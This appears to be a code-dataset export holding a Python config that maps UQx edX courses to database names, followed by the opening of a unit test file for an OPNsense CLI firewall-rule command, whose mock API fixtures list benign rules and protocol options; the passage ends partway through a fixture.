| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
87d1376eea5941afbf9f23cfb70d0e2faad54cca
| 2,695
|
py
|
Python
|
courses.py
|
UQ-UQx/old_injestor
|
e4add6d08239875af7b2669a29814e8679fffcb0
|
[
"MIT"
] | null | null | null |
courses.py
|
UQ-UQx/old_injestor
|
e4add6d08239875af7b2669a29814e8679fffcb0
|
[
"MIT"
] | 1
|
2021-06-01T21:53:15.000Z
|
2021-06-01T21:53:15.000Z
|
courses.py
|
UQ-UQx/old_injestor
|
e4add6d08239875af7b2669a29814e8679fffcb0
|
[
"MIT"
] | null | null | null |
"""
EDX_DATABASES = {
'think_101x': {'dbname': 'UQx_Think101x_1T2014', 'mongoname': 'UQx/Think101x/1T2014', 'discussiontable': 'UQx-HYPERS301x-1T2014-prod', 'icon': 'fa-heart'},
'hypers_301x': {'dbname': 'UQx_HYPERS301x_1T2014', 'mongoname': 'UQx/HYPERS301x/1T2014', 'discussiontable': 'UQx-HYPERS301x-1T2014-prod', 'icon': 'fa-plane'},
'tropic_101x': {'dbname': 'UQx_TROPIC101x_1T2014', 'mongoname': 'UQx/TROPIC101x/1T2014', 'discussiontable': 'UQx-TROPIC101x-1T2014-prod', 'icon': 'fa-tree'},
'bioimg_101x': {'dbname': 'UQx_BIOIMG101x_1T2014', 'mongoname': 'UQx/BIOIMG101x/1T2014', 'discussiontable': 'UQx-BIOIMG101x-1T2014-prod', 'icon': 'fa-desktop'},
'crime_101x': {'dbname': 'UQx_Crime101x_3T2014', 'mongoname': 'UQx/Crime101x/3T2014', 'discussiontable': 'UQx-Crime101x-3T2014-prod', 'icon': 'fa-gavel'},
'world_101x': {'dbname': 'UQx_World101x_3T2014', 'mongoname': 'UQx/World101x/3T2014', 'discussiontable': 'UQx-World101x-3T2014-prod', 'icon': 'fa-map-marker'},
'write_101x': {'dbname': 'UQx_Write101x_3T2014', 'mongoname': 'UQx/Write101x/3T2014', 'discussiontable': 'UQx-Write101x-3T2014-prod', 'icon': 'fa-pencil'},
'sense_101x': {'dbname': 'UQx_Sense101x_3T2014', 'mongoname': 'UQx/Sense101x/3T2014', 'discussiontable': 'UQx-Sense101x-3T2014-prod', 'icon': 'fa-power-off'}
}
"""
EDX_DATABASES = {
'think_101x_1T2014': {'dbname': 'UQx_Think101x_1T2014', 'mongoname': 'UQx/Think101x/1T2014', 'discussiontable': 'UQx-HYPERS301x-1T2014-prod', 'icon': 'fa-heart'},
'hypers_301x_1T2014': {'dbname': 'UQx_HYPERS301x_1T2014', 'mongoname': 'UQx/HYPERS301x/1T2014', 'discussiontable': 'UQx-HYPERS301x-1T2014-prod', 'icon': 'fa-plane'},
'tropic_101x_1T2014': {'dbname': 'UQx_TROPIC101x_1T2014', 'mongoname': 'UQx/TROPIC101x/1T2014', 'discussiontable': 'UQx-TROPIC101x-1T2014-prod', 'icon': 'fa-tree'},
'bioimg_101x_1T2014': {'dbname': 'UQx_BIOIMG101x_1T2014', 'mongoname': 'UQx/BIOIMG101x/1T2014', 'discussiontable': 'UQx-BIOIMG101x-1T2014-prod', 'icon': 'fa-desktop'},
'crime_101x_3T2014': {'dbname': 'UQx_Crime101x_3T2014', 'mongoname': 'UQx/Crime101x/3T2014', 'discussiontable': 'UQx-Crime101x-3T2014-prod', 'icon': 'fa-gavel'},
'world_101x_3T2014': {'dbname': 'UQx_World101x_3T2014', 'mongoname': 'UQx/World101x/3T2014', 'discussiontable': 'UQx-World101x-3T2014-prod', 'icon': 'fa-map-marker'},
'write_101x_3T2014': {'dbname': 'UQx_Write101x_3T2014', 'mongoname': 'UQx/Write101x/3T2014', 'discussiontable': 'UQx-Write101x-3T2014-prod', 'icon': 'fa-pencil'},
'sense_101x_3T2014': {'dbname': 'UQx_Sense101x_3T2014', 'mongoname': 'UQx/Sense101x/3T2014', 'discussiontable': 'UQx-Sense101x-3T2014-prod', 'icon': 'fa-power-off'},
}
| 117.173913
| 171
| 0.705751
| 304
| 2,695
| 6.065789
| 0.128289
| 0.078091
| 0.086768
| 0.069414
| 0.951193
| 0.951193
| 0.951193
| 0.951193
| 0.951193
| 0.951193
| 0
| 0.190553
| 0.080891
| 2,695
| 23
| 172
| 117.173913
| 0.553896
| 0.48757
| 0
| 0
| 0
| 0
| 0.739447
| 0.240175
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
359720adad99a4f9758bbe6949d1f71d55eeaccb
| 95,920
|
py
|
Python
|
opnsense_cli/tests/commands/plugin/test_firewall_rule.py
|
jan-win1993/opn-cli
|
83c4792571dacbe6483722a95276954c7a2d0b3c
|
[
"BSD-2-Clause"
] | 13
|
2021-05-17T10:42:25.000Z
|
2022-02-21T02:10:41.000Z
|
opnsense_cli/tests/commands/plugin/test_firewall_rule.py
|
jan-win1993/opn-cli
|
83c4792571dacbe6483722a95276954c7a2d0b3c
|
[
"BSD-2-Clause"
] | 14
|
2021-05-17T13:53:27.000Z
|
2021-12-16T12:45:44.000Z
|
opnsense_cli/tests/commands/plugin/test_firewall_rule.py
|
jan-win1993/opn-cli
|
83c4792571dacbe6483722a95276954c7a2d0b3c
|
[
"BSD-2-Clause"
] | 2
|
2021-04-28T08:41:07.000Z
|
2022-03-28T10:20:51.000Z
|
from unittest.mock import patch, Mock
from opnsense_cli.commands.plugin.firewall.rule import rule
from opnsense_cli.tests.commands.base import CommandTestCase
class TestFirewallRuleCommands(CommandTestCase):
def setUp(self):
self._api_data_fixtures_savepoint_OK = {
"status": "ok",
"retention": "60",
"revision": "1626265654.2136"
}
self._api_data_fixtures_savepoint_FAILED = {
"status": "failed",
}
self._api_data_fixtures_apply_OK = {
"status": "OK\n\n",
}
self._api_data_fixtures_apply_FAILED = {
"status": "FAILED\n\n",
}
self._api_data_fixtures_cancel_rollback_OK = {
"status": "\n\n",
}
self._api_data_fixtures_cancel_rollback_FAILED = {
"status": "failed\n\n",
}
self._api_data_fixtures_create_OK = {
"result": "saved",
"uuid": "85282721-934c-42be-ba4d-a93cbfda26af"
}
self._api_data_fixtures_create_ERROR = {
"result": "failed",
"validations": {"rule.source_net": "alias_not_exists is not a valid source IP address or alias."}
}
self._api_data_fixtures_update_OK = {
"result": "saved"
}
self._api_data_fixtures_update_NOT_EXISTS = {
"result": "failed"
}
self._api_data_fixtures_delete_NOT_FOUND = {
"result": "not found"
}
self._api_data_fixtures_delete_OK = {
"result": "deleted"
}
self._api_data_fixtures_list = {
"filter": {
"rules": {
"rule": {
"b468c719-89db-45a8-bd02-b081246dc002": {
"enabled": "1",
"sequence": "1",
"action": {
"pass": {
"value": "Pass",
"selected": 1
},
"block": {
"value": "Block",
"selected": 0
},
"reject": {
"value": "Reject",
"selected": 0
}
},
"quick": "1",
"interface": {
"lan": {
"value": "LAN",
"selected": 1
},
"lo0": {
"value": "Loopback",
"selected": 0
},
"wan": {
"value": "WAN",
"selected": 0
}
},
"direction": {
"in": {
"value": "In",
"selected": 1
},
"out": {
"value": "Out",
"selected": 0
}
},
"ipprotocol": {
"inet": {
"value": "IPv4",
"selected": 1
},
"inet6": {
"value": "IPv6",
"selected": 0
}
},
"protocol": {
"any": {
"value": "any",
"selected": 0
},
"ICMP": {
"value": "ICMP",
"selected": 0
},
"IGMP": {
"value": "IGMP",
"selected": 0
},
"GGP": {
"value": "GGP",
"selected": 0
},
"IPENCAP": {
"value": "IPENCAP",
"selected": 0
},
"ST2": {
"value": "ST2",
"selected": 0
},
"TCP": {
"value": "TCP",
"selected": 1
},
"CBT": {
"value": "CBT",
"selected": 0
},
"EGP": {
"value": "EGP",
"selected": 0
},
"IGP": {
"value": "IGP",
"selected": 0
},
"BBN-RCC": {
"value": "BBN-RCC",
"selected": 0
},
"NVP": {
"value": "NVP",
"selected": 0
},
"PUP": {
"value": "PUP",
"selected": 0
},
"ARGUS": {
"value": "ARGUS",
"selected": 0
},
"EMCON": {
"value": "EMCON",
"selected": 0
},
"XNET": {
"value": "XNET",
"selected": 0
},
"CHAOS": {
"value": "CHAOS",
"selected": 0
},
"UDP": {
"value": "UDP",
"selected": 0
},
"MUX": {
"value": "MUX",
"selected": 0
},
"DCN": {
"value": "DCN",
"selected": 0
},
"HMP": {
"value": "HMP",
"selected": 0
},
"PRM": {
"value": "PRM",
"selected": 0
},
"XNS-IDP": {
"value": "XNS-IDP",
"selected": 0
},
"TRUNK-1": {
"value": "TRUNK-1",
"selected": 0
},
"TRUNK-2": {
"value": "TRUNK-2",
"selected": 0
},
"LEAF-1": {
"value": "LEAF-1",
"selected": 0
},
"LEAF-2": {
"value": "LEAF-2",
"selected": 0
},
"RDP": {
"value": "RDP",
"selected": 0
},
"IRTP": {
"value": "IRTP",
"selected": 0
},
"ISO-TP4": {
"value": "ISO-TP4",
"selected": 0
},
"NETBLT": {
"value": "NETBLT",
"selected": 0
},
"MFE-NSP": {
"value": "MFE-NSP",
"selected": 0
},
"MERIT-INP": {
"value": "MERIT-INP",
"selected": 0
},
"DCCP": {
"value": "DCCP",
"selected": 0
},
"3PC": {
"value": "3PC",
"selected": 0
},
"IDPR": {
"value": "IDPR",
"selected": 0
},
"XTP": {
"value": "XTP",
"selected": 0
},
"DDP": {
"value": "DDP",
"selected": 0
},
"IDPR-CMTP": {
"value": "IDPR-CMTP",
"selected": 0
},
"TP++": {
"value": "TP++",
"selected": 0
},
"IL": {
"value": "IL",
"selected": 0
},
"IPV6": {
"value": "IPV6",
"selected": 0
},
"SDRP": {
"value": "SDRP",
"selected": 0
},
"IDRP": {
"value": "IDRP",
"selected": 0
},
"RSVP": {
"value": "RSVP",
"selected": 0
},
"GRE": {
"value": "GRE",
"selected": 0
},
"DSR": {
"value": "DSR",
"selected": 0
},
"BNA": {
"value": "BNA",
"selected": 0
},
"ESP": {
"value": "ESP",
"selected": 0
},
"AH": {
"value": "AH",
"selected": 0
},
"I-NLSP": {
"value": "I-NLSP",
"selected": 0
},
"SWIPE": {
"value": "SWIPE",
"selected": 0
},
"NARP": {
"value": "NARP",
"selected": 0
},
"MOBILE": {
"value": "MOBILE",
"selected": 0
},
"TLSP": {
"value": "TLSP",
"selected": 0
},
"SKIP": {
"value": "SKIP",
"selected": 0
},
"IPV6-ICMP": {
"value": "IPV6-ICMP",
"selected": 0
},
"CFTP": {
"value": "CFTP",
"selected": 0
},
"SAT-EXPAK": {
"value": "SAT-EXPAK",
"selected": 0
},
"KRYPTOLAN": {
"value": "KRYPTOLAN",
"selected": 0
},
"RVD": {
"value": "RVD",
"selected": 0
},
"IPPC": {
"value": "IPPC",
"selected": 0
},
"SAT-MON": {
"value": "SAT-MON",
"selected": 0
},
"VISA": {
"value": "VISA",
"selected": 0
},
"IPCV": {
"value": "IPCV",
"selected": 0
},
"CPNX": {
"value": "CPNX",
"selected": 0
},
"CPHB": {
"value": "CPHB",
"selected": 0
},
"WSN": {
"value": "WSN",
"selected": 0
},
"PVP": {
"value": "PVP",
"selected": 0
},
"BR-SAT-MON": {
"value": "BR-SAT-MON",
"selected": 0
},
"SUN-ND": {
"value": "SUN-ND",
"selected": 0
},
"WB-MON": {
"value": "WB-MON",
"selected": 0
},
"WB-EXPAK": {
"value": "WB-EXPAK",
"selected": 0
},
"ISO-IP": {
"value": "ISO-IP",
"selected": 0
},
"VMTP": {
"value": "VMTP",
"selected": 0
},
"SECURE-VMTP": {
"value": "SECURE-VMTP",
"selected": 0
},
"VINES": {
"value": "VINES",
"selected": 0
},
"TTP": {
"value": "TTP",
"selected": 0
},
"NSFNET-IGP": {
"value": "NSFNET-IGP",
"selected": 0
},
"DGP": {
"value": "DGP",
"selected": 0
},
"TCF": {
"value": "TCF",
"selected": 0
},
"EIGRP": {
"value": "EIGRP",
"selected": 0
},
"OSPF": {
"value": "OSPF",
"selected": 0
},
"SPRITE-RPC": {
"value": "SPRITE-RPC",
"selected": 0
},
"LARP": {
"value": "LARP",
"selected": 0
},
"MTP": {
"value": "MTP",
"selected": 0
},
"AX.25": {
"value": "AX.25",
"selected": 0
},
"IPIP": {
"value": "IPIP",
"selected": 0
},
"MICP": {
"value": "MICP",
"selected": 0
},
"SCC-SP": {
"value": "SCC-SP",
"selected": 0
},
"ETHERIP": {
"value": "ETHERIP",
"selected": 0
},
"ENCAP": {
"value": "ENCAP",
"selected": 0
},
"GMTP": {
"value": "GMTP",
"selected": 0
},
"IFMP": {
"value": "IFMP",
"selected": 0
},
"PNNI": {
"value": "PNNI",
"selected": 0
},
"PIM": {
"value": "PIM",
"selected": 0
},
"ARIS": {
"value": "ARIS",
"selected": 0
},
"SCPS": {
"value": "SCPS",
"selected": 0
},
"QNX": {
"value": "QNX",
"selected": 0
},
"A/N": {
"value": "A/N",
"selected": 0
},
"IPCOMP": {
"value": "IPCOMP",
"selected": 0
},
"SNP": {
"value": "SNP",
"selected": 0
},
"COMPAQ-PEER": {
"value": "COMPAQ-PEER",
"selected": 0
},
"IPX-IN-IP": {
"value": "IPX-IN-IP",
"selected": 0
},
"CARP": {
"value": "CARP",
"selected": 0
},
"PGM": {
"value": "PGM",
"selected": 0
},
"L2TP": {
"value": "L2TP",
"selected": 0
},
"DDX": {
"value": "DDX",
"selected": 0
},
"IATP": {
"value": "IATP",
"selected": 0
},
"STP": {
"value": "STP",
"selected": 0
},
"SRP": {
"value": "SRP",
"selected": 0
},
"UTI": {
"value": "UTI",
"selected": 0
},
"SMP": {
"value": "SMP",
"selected": 0
},
"SM": {
"value": "SM",
"selected": 0
},
"PTP": {
"value": "PTP",
"selected": 0
},
"ISIS": {
"value": "ISIS",
"selected": 0
},
"CRTP": {
"value": "CRTP",
"selected": 0
},
"CRUDP": {
"value": "CRUDP",
"selected": 0
},
"SPS": {
"value": "SPS",
"selected": 0
},
"PIPE": {
"value": "PIPE",
"selected": 0
},
"SCTP": {
"value": "SCTP",
"selected": 0
},
"FC": {
"value": "FC",
"selected": 0
},
"RSVP-E2E-IGNORE": {
"value": "RSVP-E2E-IGNORE",
"selected": 0
},
"UDPLITE": {
"value": "UDPLITE",
"selected": 0
},
"MPLS-IN-IP": {
"value": "MPLS-IN-IP",
"selected": 0
},
"MANET": {
"value": "MANET",
"selected": 0
},
"HIP": {
"value": "HIP",
"selected": 0
},
"SHIM6": {
"value": "SHIM6",
"selected": 0
},
"WESP": {
"value": "WESP",
"selected": 0
},
"ROHC": {
"value": "ROHC",
"selected": 0
},
"PFSYNC": {
"value": "PFSYNC",
"selected": 0
},
"DIVERT": {
"value": "DIVERT",
"selected": 0
}
},
"source_net": "10.0.0.0/24",
"source_not": "0",
"source_port": "80",
"destination_net": "192.168.0.0/24",
"destination_not": "0",
"destination_port": "http",
"gateway": {
"": {
"value": "none",
"selected": True
},
"Null4": {
"value": "Null4 - 127.0.0.1",
"selected": 0
},
"Null6": {
"value": "Null6 - ::1",
"selected": 0
},
"WAN_DHCP": {
"value": "WAN_DHCP - 10.0.2.2",
"selected": 0
},
"WAN_DHCP6": {
"value": "WAN_DHCP6 - inet6",
"selected": 0
}
},
"log": "0",
"description": "test Rule astuerz"
},
"fb0e1f6c-9f39-46dd-9c98-27fc314a2429": {
"enabled": "1",
"sequence": "5",
"action": {
"pass": {
"value": "Pass",
"selected": 1
},
"block": {
"value": "Block",
"selected": 0
},
"reject": {
"value": "Reject",
"selected": 0
}
},
"quick": "1",
"interface": {
"lan": {
"value": "LAN",
"selected": 1
},
"lo0": {
"value": "Loopback",
"selected": 0
},
"wan": {
"value": "WAN",
"selected": 0
}
},
"direction": {
"in": {
"value": "In",
"selected": 1
},
"out": {
"value": "Out",
"selected": 0
}
},
"ipprotocol": {
"inet": {
"value": "IPv4",
"selected": 1
},
"inet6": {
"value": "IPv6",
"selected": 0
}
},
"protocol": {
"any": {
"value": "any",
"selected": 0
},
"ICMP": {
"value": "ICMP",
"selected": 0
},
"IGMP": {
"value": "IGMP",
"selected": 0
},
"GGP": {
"value": "GGP",
"selected": 0
},
"IPENCAP": {
"value": "IPENCAP",
"selected": 0
},
"ST2": {
"value": "ST2",
"selected": 0
},
"TCP": {
"value": "TCP",
"selected": 1
},
"CBT": {
"value": "CBT",
"selected": 0
},
"EGP": {
"value": "EGP",
"selected": 0
},
"IGP": {
"value": "IGP",
"selected": 0
},
"BBN-RCC": {
"value": "BBN-RCC",
"selected": 0
},
"NVP": {
"value": "NVP",
"selected": 0
},
"PUP": {
"value": "PUP",
"selected": 0
},
"ARGUS": {
"value": "ARGUS",
"selected": 0
},
"EMCON": {
"value": "EMCON",
"selected": 0
},
"XNET": {
"value": "XNET",
"selected": 0
},
"CHAOS": {
"value": "CHAOS",
"selected": 0
},
"UDP": {
"value": "UDP",
"selected": 0
},
"MUX": {
"value": "MUX",
"selected": 0
},
"DCN": {
"value": "DCN",
"selected": 0
},
"HMP": {
"value": "HMP",
"selected": 0
},
"PRM": {
"value": "PRM",
"selected": 0
},
"XNS-IDP": {
"value": "XNS-IDP",
"selected": 0
},
"TRUNK-1": {
"value": "TRUNK-1",
"selected": 0
},
"TRUNK-2": {
"value": "TRUNK-2",
"selected": 0
},
"LEAF-1": {
"value": "LEAF-1",
"selected": 0
},
"LEAF-2": {
"value": "LEAF-2",
"selected": 0
},
"RDP": {
"value": "RDP",
"selected": 0
},
"IRTP": {
"value": "IRTP",
"selected": 0
},
"ISO-TP4": {
"value": "ISO-TP4",
"selected": 0
},
"NETBLT": {
"value": "NETBLT",
"selected": 0
},
"MFE-NSP": {
"value": "MFE-NSP",
"selected": 0
},
"MERIT-INP": {
"value": "MERIT-INP",
"selected": 0
},
"DCCP": {
"value": "DCCP",
"selected": 0
},
"3PC": {
"value": "3PC",
"selected": 0
},
"IDPR": {
"value": "IDPR",
"selected": 0
},
"XTP": {
"value": "XTP",
"selected": 0
},
"DDP": {
"value": "DDP",
"selected": 0
},
"IDPR-CMTP": {
"value": "IDPR-CMTP",
"selected": 0
},
"TP++": {
"value": "TP++",
"selected": 0
},
"IL": {
"value": "IL",
"selected": 0
},
"IPV6": {
"value": "IPV6",
"selected": 0
},
"SDRP": {
"value": "SDRP",
"selected": 0
},
"IDRP": {
"value": "IDRP",
"selected": 0
},
"RSVP": {
"value": "RSVP",
"selected": 0
},
"GRE": {
"value": "GRE",
"selected": 0
},
"DSR": {
"value": "DSR",
"selected": 0
},
"BNA": {
"value": "BNA",
"selected": 0
},
"ESP": {
"value": "ESP",
"selected": 0
},
"AH": {
"value": "AH",
"selected": 0
},
"I-NLSP": {
"value": "I-NLSP",
"selected": 0
},
"SWIPE": {
"value": "SWIPE",
"selected": 0
},
"NARP": {
"value": "NARP",
"selected": 0
},
"MOBILE": {
"value": "MOBILE",
"selected": 0
},
"TLSP": {
"value": "TLSP",
"selected": 0
},
"SKIP": {
"value": "SKIP",
"selected": 0
},
"IPV6-ICMP": {
"value": "IPV6-ICMP",
"selected": 0
},
"CFTP": {
"value": "CFTP",
"selected": 0
},
"SAT-EXPAK": {
"value": "SAT-EXPAK",
"selected": 0
},
"KRYPTOLAN": {
"value": "KRYPTOLAN",
"selected": 0
},
"RVD": {
"value": "RVD",
"selected": 0
},
"IPPC": {
"value": "IPPC",
"selected": 0
},
"SAT-MON": {
"value": "SAT-MON",
"selected": 0
},
"VISA": {
"value": "VISA",
"selected": 0
},
"IPCV": {
"value": "IPCV",
"selected": 0
},
"CPNX": {
"value": "CPNX",
"selected": 0
},
"CPHB": {
"value": "CPHB",
"selected": 0
},
"WSN": {
"value": "WSN",
"selected": 0
},
"PVP": {
"value": "PVP",
"selected": 0
},
"BR-SAT-MON": {
"value": "BR-SAT-MON",
"selected": 0
},
"SUN-ND": {
"value": "SUN-ND",
"selected": 0
},
"WB-MON": {
"value": "WB-MON",
"selected": 0
},
"WB-EXPAK": {
"value": "WB-EXPAK",
"selected": 0
},
"ISO-IP": {
"value": "ISO-IP",
"selected": 0
},
"VMTP": {
"value": "VMTP",
"selected": 0
},
"SECURE-VMTP": {
"value": "SECURE-VMTP",
"selected": 0
},
"VINES": {
"value": "VINES",
"selected": 0
},
"TTP": {
"value": "TTP",
"selected": 0
},
"NSFNET-IGP": {
"value": "NSFNET-IGP",
"selected": 0
},
"DGP": {
"value": "DGP",
"selected": 0
},
"TCF": {
"value": "TCF",
"selected": 0
},
"EIGRP": {
"value": "EIGRP",
"selected": 0
},
"OSPF": {
"value": "OSPF",
"selected": 0
},
"SPRITE-RPC": {
"value": "SPRITE-RPC",
"selected": 0
},
"LARP": {
"value": "LARP",
"selected": 0
},
"MTP": {
"value": "MTP",
"selected": 0
},
"AX.25": {
"value": "AX.25",
"selected": 0
},
"IPIP": {
"value": "IPIP",
"selected": 0
},
"MICP": {
"value": "MICP",
"selected": 0
},
"SCC-SP": {
"value": "SCC-SP",
"selected": 0
},
"ETHERIP": {
"value": "ETHERIP",
"selected": 0
},
"ENCAP": {
"value": "ENCAP",
"selected": 0
},
"GMTP": {
"value": "GMTP",
"selected": 0
},
"IFMP": {
"value": "IFMP",
"selected": 0
},
"PNNI": {
"value": "PNNI",
"selected": 0
},
"PIM": {
"value": "PIM",
"selected": 0
},
"ARIS": {
"value": "ARIS",
"selected": 0
},
"SCPS": {
"value": "SCPS",
"selected": 0
},
"QNX": {
"value": "QNX",
"selected": 0
},
"A/N": {
"value": "A/N",
"selected": 0
},
"IPCOMP": {
"value": "IPCOMP",
"selected": 0
},
"SNP": {
"value": "SNP",
"selected": 0
},
"COMPAQ-PEER": {
"value": "COMPAQ-PEER",
"selected": 0
},
"IPX-IN-IP": {
"value": "IPX-IN-IP",
"selected": 0
},
"CARP": {
"value": "CARP",
"selected": 0
},
"PGM": {
"value": "PGM",
"selected": 0
},
"L2TP": {
"value": "L2TP",
"selected": 0
},
"DDX": {
"value": "DDX",
"selected": 0
},
"IATP": {
"value": "IATP",
"selected": 0
},
"STP": {
"value": "STP",
"selected": 0
},
"SRP": {
"value": "SRP",
"selected": 0
},
"UTI": {
"value": "UTI",
"selected": 0
},
"SMP": {
"value": "SMP",
"selected": 0
},
"SM": {
"value": "SM",
"selected": 0
},
"PTP": {
"value": "PTP",
"selected": 0
},
"ISIS": {
"value": "ISIS",
"selected": 0
},
"CRTP": {
"value": "CRTP",
"selected": 0
},
"CRUDP": {
"value": "CRUDP",
"selected": 0
},
"SPS": {
"value": "SPS",
"selected": 0
},
"PIPE": {
"value": "PIPE",
"selected": 0
},
"SCTP": {
"value": "SCTP",
"selected": 0
},
"FC": {
"value": "FC",
"selected": 0
},
"RSVP-E2E-IGNORE": {
"value": "RSVP-E2E-IGNORE",
"selected": 0
},
"UDPLITE": {
"value": "UDPLITE",
"selected": 0
},
"MPLS-IN-IP": {
"value": "MPLS-IN-IP",
"selected": 0
},
"MANET": {
"value": "MANET",
"selected": 0
},
"HIP": {
"value": "HIP",
"selected": 0
},
"SHIM6": {
"value": "SHIM6",
"selected": 0
},
"WESP": {
"value": "WESP",
"selected": 0
},
"ROHC": {
"value": "ROHC",
"selected": 0
},
"PFSYNC": {
"value": "PFSYNC",
"selected": 0
},
"DIVERT": {
"value": "DIVERT",
"selected": 0
}
},
"source_net": "my_alias",
"source_not": "0",
"source_port": "",
"destination_net": "my_alias",
"destination_not": "0",
"destination_port": "http",
"gateway": {
"": {
"value": "none",
"selected": True
},
"Null4": {
"value": "Null4 - 127.0.0.1",
"selected": 0
},
"Null6": {
"value": "Null6 - ::1",
"selected": 0
},
"WAN_DHCP": {
"value": "WAN_DHCP - 10.0.2.2",
"selected": 0
},
"WAN_DHCP6": {
"value": "WAN_DHCP6 - inet6",
"selected": 0
}
},
"log": "0",
"description": "test Rule with alias"
},
"39d68aa9-b7cd-40ab-b4c3-1c1c36a3a367": {
"enabled": "1",
"sequence": "10",
"action": {
"pass": {
"value": "Pass",
"selected": 1
},
"block": {
"value": "Block",
"selected": 0
},
"reject": {
"value": "Reject",
"selected": 0
}
},
"quick": "1",
"interface": {
"lan": {
"value": "LAN",
"selected": 1
},
"lo0": {
"value": "Loopback",
"selected": 0
},
"wan": {
"value": "WAN",
"selected": 0
}
},
"direction": {
"in": {
"value": "In",
"selected": 1
},
"out": {
"value": "Out",
"selected": 0
}
},
"ipprotocol": {
"inet": {
"value": "IPv4",
"selected": 1
},
"inet6": {
"value": "IPv6",
"selected": 0
}
},
"protocol": {
"any": {
"value": "any",
"selected": 0
},
"ICMP": {
"value": "ICMP",
"selected": 0
},
"IGMP": {
"value": "IGMP",
"selected": 0
},
"GGP": {
"value": "GGP",
"selected": 0
},
"IPENCAP": {
"value": "IPENCAP",
"selected": 0
},
"ST2": {
"value": "ST2",
"selected": 0
},
"TCP": {
"value": "TCP",
"selected": 1
},
"CBT": {
"value": "CBT",
"selected": 0
},
"EGP": {
"value": "EGP",
"selected": 0
},
"IGP": {
"value": "IGP",
"selected": 0
},
"BBN-RCC": {
"value": "BBN-RCC",
"selected": 0
},
"NVP": {
"value": "NVP",
"selected": 0
},
"PUP": {
"value": "PUP",
"selected": 0
},
"ARGUS": {
"value": "ARGUS",
"selected": 0
},
"EMCON": {
"value": "EMCON",
"selected": 0
},
"XNET": {
"value": "XNET",
"selected": 0
},
"CHAOS": {
"value": "CHAOS",
"selected": 0
},
"UDP": {
"value": "UDP",
"selected": 0
},
"MUX": {
"value": "MUX",
"selected": 0
},
"DCN": {
"value": "DCN",
"selected": 0
},
"HMP": {
"value": "HMP",
"selected": 0
},
"PRM": {
"value": "PRM",
"selected": 0
},
"XNS-IDP": {
"value": "XNS-IDP",
"selected": 0
},
"TRUNK-1": {
"value": "TRUNK-1",
"selected": 0
},
"TRUNK-2": {
"value": "TRUNK-2",
"selected": 0
},
"LEAF-1": {
"value": "LEAF-1",
"selected": 0
},
"LEAF-2": {
"value": "LEAF-2",
"selected": 0
},
"RDP": {
"value": "RDP",
"selected": 0
},
"IRTP": {
"value": "IRTP",
"selected": 0
},
"ISO-TP4": {
"value": "ISO-TP4",
"selected": 0
},
"NETBLT": {
"value": "NETBLT",
"selected": 0
},
"MFE-NSP": {
"value": "MFE-NSP",
"selected": 0
},
"MERIT-INP": {
"value": "MERIT-INP",
"selected": 0
},
"DCCP": {
"value": "DCCP",
"selected": 0
},
"3PC": {
"value": "3PC",
"selected": 0
},
"IDPR": {
"value": "IDPR",
"selected": 0
},
"XTP": {
"value": "XTP",
"selected": 0
},
"DDP": {
"value": "DDP",
"selected": 0
},
"IDPR-CMTP": {
"value": "IDPR-CMTP",
"selected": 0
},
"TP++": {
"value": "TP++",
"selected": 0
},
"IL": {
"value": "IL",
"selected": 0
},
"IPV6": {
"value": "IPV6",
"selected": 0
},
"SDRP": {
"value": "SDRP",
"selected": 0
},
"IDRP": {
"value": "IDRP",
"selected": 0
},
"RSVP": {
"value": "RSVP",
"selected": 0
},
"GRE": {
"value": "GRE",
"selected": 0
},
"DSR": {
"value": "DSR",
"selected": 0
},
"BNA": {
"value": "BNA",
"selected": 0
},
"ESP": {
"value": "ESP",
"selected": 0
},
"AH": {
"value": "AH",
"selected": 0
},
"I-NLSP": {
"value": "I-NLSP",
"selected": 0
},
"SWIPE": {
"value": "SWIPE",
"selected": 0
},
"NARP": {
"value": "NARP",
"selected": 0
},
"MOBILE": {
"value": "MOBILE",
"selected": 0
},
"TLSP": {
"value": "TLSP",
"selected": 0
},
"SKIP": {
"value": "SKIP",
"selected": 0
},
"IPV6-ICMP": {
"value": "IPV6-ICMP",
"selected": 0
},
"CFTP": {
"value": "CFTP",
"selected": 0
},
"SAT-EXPAK": {
"value": "SAT-EXPAK",
"selected": 0
},
"KRYPTOLAN": {
"value": "KRYPTOLAN",
"selected": 0
},
"RVD": {
"value": "RVD",
"selected": 0
},
"IPPC": {
"value": "IPPC",
"selected": 0
},
"SAT-MON": {
"value": "SAT-MON",
"selected": 0
},
"VISA": {
"value": "VISA",
"selected": 0
},
"IPCV": {
"value": "IPCV",
"selected": 0
},
"CPNX": {
"value": "CPNX",
"selected": 0
},
"CPHB": {
"value": "CPHB",
"selected": 0
},
"WSN": {
"value": "WSN",
"selected": 0
},
"PVP": {
"value": "PVP",
"selected": 0
},
"BR-SAT-MON": {
"value": "BR-SAT-MON",
"selected": 0
},
"SUN-ND": {
"value": "SUN-ND",
"selected": 0
},
"WB-MON": {
"value": "WB-MON",
"selected": 0
},
"WB-EXPAK": {
"value": "WB-EXPAK",
"selected": 0
},
"ISO-IP": {
"value": "ISO-IP",
"selected": 0
},
"VMTP": {
"value": "VMTP",
"selected": 0
},
"SECURE-VMTP": {
"value": "SECURE-VMTP",
"selected": 0
},
"VINES": {
"value": "VINES",
"selected": 0
},
"TTP": {
"value": "TTP",
"selected": 0
},
"NSFNET-IGP": {
"value": "NSFNET-IGP",
"selected": 0
},
"DGP": {
"value": "DGP",
"selected": 0
},
"TCF": {
"value": "TCF",
"selected": 0
},
"EIGRP": {
"value": "EIGRP",
"selected": 0
},
"OSPF": {
"value": "OSPF",
"selected": 0
},
"SPRITE-RPC": {
"value": "SPRITE-RPC",
"selected": 0
},
"LARP": {
"value": "LARP",
"selected": 0
},
"MTP": {
"value": "MTP",
"selected": 0
},
"AX.25": {
"value": "AX.25",
"selected": 0
},
"IPIP": {
"value": "IPIP",
"selected": 0
},
"MICP": {
"value": "MICP",
"selected": 0
},
"SCC-SP": {
"value": "SCC-SP",
"selected": 0
},
"ETHERIP": {
"value": "ETHERIP",
"selected": 0
